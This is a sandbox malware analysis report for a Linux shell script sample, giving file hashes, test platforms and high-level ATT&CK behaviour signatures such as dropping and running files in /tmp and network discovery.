Analysis
-
max time kernel
18s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system -
submitted
28/10/2024, 02:34
Static task
static1
Behavioral task
behavioral1
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
-
Size
10KB
-
MD5
7b4d271e102cd41b604d6fea5d979e2d
-
SHA1
56b5d99bae8b5353d96d700fda3d30d396cc9828
-
SHA256
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91
-
SHA512
ac1884092a54f7829359fccf4958bfc2add2cc2a89006fc0fadd30221a55d9c559a91e0a83747d00161c63e152fef77f819c20574cbd81fb4bdde05f1ed486c5
-
SSDEEP
192:C83Wep8P79w808A8uBpzuRtUltYv3WfjIK3qRtUlta808A8uBpKv3WfjaB83hP7W:Crep8P79w808A8uBpzyv3WfjIK38808f
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97